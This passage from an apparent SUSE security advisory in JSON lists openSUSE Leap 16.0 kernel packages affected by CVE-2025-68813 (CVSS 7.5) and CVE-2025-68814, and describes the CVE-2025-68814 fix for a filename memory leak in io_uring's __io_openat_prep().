"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-68814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix filename leak in __io_openat_prep()\n\n __io_openat_prep() allocates a struct filename using getname(). However,\nfor the condition of the file being installed in the fixed file table as\nwell as having O_CLOEXEC flag set, the function returns early. At that\npoint, the request doesn\u0027t have REQ_F_NEED_CLEANUP flag set. Due to this,\nthe memory for the newly allocated struct filename is not cleaned up,\ncausing a memory leak.\n\nFix this by setting the REQ_F_NEED_CLEANUP for the request just after the\nsuccessful getname() call, so that when the request is torn down, the\nfilename will be cleaned up, along with other resources needing cleanup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
